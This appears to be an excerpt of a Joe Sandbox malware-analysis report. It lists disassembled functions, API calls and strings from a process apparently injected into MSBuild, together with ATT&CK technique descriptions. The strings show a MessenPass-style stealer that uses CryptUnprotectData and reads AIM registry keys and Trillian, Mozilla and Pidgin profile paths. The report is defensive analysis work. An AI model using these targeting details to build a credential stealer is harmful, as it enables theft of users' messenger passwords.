Part of subcall function 0040876F: _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808

Part of subcall function 00407034: memset.MSVCRT ref: 00407055
Part of subcall function 00407034: sprintf.MSVCRT ref: 0040707E
Part of subcall function 00407034: strlen.MSVCRT ref: 0040708A
Part of subcall function 00407034: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 0040709F
Part of subcall function 00407034: strlen.MSVCRT ref: 004070AD
Part of subcall function 00407034: memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 004070BD

Part of subcall function 00406E60: _mbscpy.MSVCRT(?,?), ref: 00406EC6

Strings

*.htm;*.html, xrefs: 0040B960
txt, xrefs: 0040B9C7, 0040B9CA
*.csv, xrefs: 0040B995
*.xml, xrefs: 0040B989
*.txt, xrefs: 0040B933

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 2726666094-3614832568
Opcode ID: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
Instruction ID: 663635aaa2767a47ae833ce325b1c2bbb94a135e02c7cec880bc1d98f4d47d81
Opcode Fuzzy Hash: 48ad67bf17a677834281717159f6163cc093dbae317e4fe0e66c085f04f9eb92
Instruction Fuzzy Hash: 8E21EBB5C002189FCB01FFA5DA817DDBBB4AB08708F20417FE549B7286DF381A558B99

Function 00406CAA Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00406CB5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00406CC6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00406CCD
ReleaseDC.USER32(00000000,00000000), ref: 00406CD5
GetWindowRect.USER32(?,?), ref: 00406CE2
MoveWindow.USER32(?,?,?,?,?,00000001,?,75BF6C10), ref: 00406D20

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CapsDeviceWindow$MoveRectRelease
String ID:
API String ID: 3197862061-0
Opcode ID: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
Instruction ID: 8a34af0b3d0659c25a6c3d8e0783375a2f2358695c0a050eea5ba45bf34a7176
Opcode Fuzzy Hash: 46aa025759630b167b55e315cdb859b7672f25e3c69014d30f42312940603d98
Instruction Fuzzy Hash: 62118E32A00219EFDB009FB9CD4DEEF7FB8EB84750F054165F905A7250DA70AD01CAA0

Function 00408C31 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408C55
GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
_mbscpy.MSVCRT(?,?), ref: 00408C91

Strings

<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
?@, xrefs: 00408C31

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: PrivateProfileString_mbscpymemset
String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
API String ID: 408644273-2377969721
Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC

Function 00406830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00406840
sprintf.MSVCRT ref: 00406868
MessageBoxA.USER32(?,?,Error,00000030), ref: 00406881

Strings

Error %d: %s, xrefs: 00406862
Error, xrefs: 00406872

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 1670431679-1552265934
Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8

Function 004108FA Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

memset.MSVCRT ref: 00410939
memset.MSVCRT ref: 0041097A

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$AddressLibraryLoadProc
String ID:
API String ID: 95357979-0
Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64

Function 0040A455 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

memset.MSVCRT ref: 0040A48B

Part of subcall function 0041244B: memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040A4AC,?,?), ref: 004124B9

Part of subcall function 00409DD6: _mbscpy.MSVCRT(00000000,?,0040A4C1,?,?,?), ref: 00409DDB
Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E

sprintf.MSVCRT ref: 0040A4D0

Strings

<%s>%s</%s>, xrefs: 0040A4C8
<item>, xrefs: 0040A45F
</item>, xrefs: 0040A4EA

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 3337535707-2769808009
Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88

Function 00402834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00402873

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

RegCloseKey.ADVAPI32(?), ref: 004028C2
RegCloseKey.ADVAPI32(?), ref: 004028DF

Strings

Software\AIM\AIMPRO, xrefs: 00402841

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Close$EnumOpenmemset
String ID: Software\AIM\AIMPRO
API String ID: 2255314230-3527110354
Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64

Function 00410894 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(0041DEB0,?,00000050,?,00402B32,?), ref: 004108AE
memcpy.MSVCRT(0041DBE0,?,000002CC,0041DEB0,?,00000050,?,00402B32,?), ref: 004108C0
DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4

Strings

;4, xrefs: 004108C0

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$DialogParam
String ID: ;4
API String ID: 392721444-4181167889
Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC

Function 00401085 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
Part of subcall function 00406A19: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,0040109D,MS Sans Serif,0000000A,00000001), ref: 00406A63

CreateFontIndirectA.GDI32(?), ref: 004010AA
GetDlgItem.USER32(?,000003EC), ref: 004010BA
SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7

Strings

MS Sans Serif, xrefs: 00401090

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CreateFontIndirectItemMessageSend_mbscpymemset
String ID: MS Sans Serif
API String ID: 2650341901-168460110
Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88

Function 00412D65 Relevance: 6.3, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 00406D91: memset.MSVCRT ref: 00406D9F

??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,0040EAF1), ref: 00412D7A
??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,0040EAF1), ref: 00412D98
??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,0040EAF1), ref: 00412DB3
??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,0040EAF1), ref: 00412DDC
??2@YAPAXI@Z.MSVCRT(00000014,?,00000000,0040EAF1), ref: 00412E00

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
Opcode Fuzzy Hash: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19

Function 00407944 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,?,?,00402AEE,?,?,?,?,00419778,0000000C), ref: 00407979
memset.MSVCRT ref: 0040798A
memcpy.MSVCRT(0041DA60,?,?,00000000,00000000,?,00000000,?,?,00402AEE,?,?,?,?,00419778,0000000C), ref: 00407996
??3@YAXPAX@Z.MSVCRT ref: 004079A3

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 23d1f598fdf136e106d7ab2debb23a2d8b25e7b6f1538b4183cb019f65a048fe
Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
Opcode Fuzzy Hash: 23d1f598fdf136e106d7ab2debb23a2d8b25e7b6f1538b4183cb019f65a048fe
Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55

Function 0040E4B6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E4DF
strlen.MSVCRT ref: 0040E4EA
strlen.MSVCRT ref: 0040E4F8

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

prefs.js, xrefs: 0040E4F0, 0040E4F5, 0040E506

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: prefs.js
API String ID: 581844971-3783873740
Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794

Function 0040D4E9 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D516
strlen.MSVCRT ref: 0040D52E
strlen.MSVCRT ref: 0040D53C

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

Mozilla\Profiles, xrefs: 0040D529, 0040D552

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: Mozilla\Profiles
API String ID: 581844971-2796945589
Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9

Function 0040D578 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D5A5
strlen.MSVCRT ref: 0040D5BD
strlen.MSVCRT ref: 0040D5CB

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

.purple, xrefs: 0040D5B8, 0040D5E1

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: .purple
API String ID: 581844971-1504268026
Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD

Function 0040B15B Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
Part of subcall function 0040876F: memcpy.MSVCRT(00000000,00000001), ref: 00408877

sprintf.MSVCRT ref: 0040B181
SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4

Part of subcall function 0040876F: _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808

sprintf.MSVCRT ref: 0040B1AB
_mbscat.MSVCRT ref: 0040B1BE

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
String ID:
API String ID: 203655857-0
Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68

Function 0040783B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972

strlen.MSVCRT ref: 00407862
strlen.MSVCRT ref: 0040786F

Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

B@, xrefs: 00407846
*.*, xrefs: 00407867, 0040786C, 00407883

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$CloseFind_mbscat_mbscpymemcpy
String ID: *.*$B@
API String ID: 470300861-2086290067
Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF

Function 00409141 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004069E8: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409147,00000000,0040905A,?,00000000,00000104), ref: 004069F3

strrchr.MSVCRT ref: 0040914A
_mbscat.MSVCRT ref: 0040915F

Strings

_lng.ini, xrefs: 00409159

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: FileModuleName_mbscatstrrchr
String ID: _lng.ini
API String ID: 3334749609-1948609170
Opcode ID: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
Instruction ID: a8986b5d0fc5065fa4420194992ab4643f38d39362f1d3b193e5f677e6d35072
Opcode Fuzzy Hash: 08864fd35b35f6e10160a6b7cad974f4c4e5e5894a63cb91cea6d61644888c54
Instruction Fuzzy Hash: D7C0127124565054E11231222D03BCB05480F12705F29006FFC01781C3EE5D4A9180AE

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

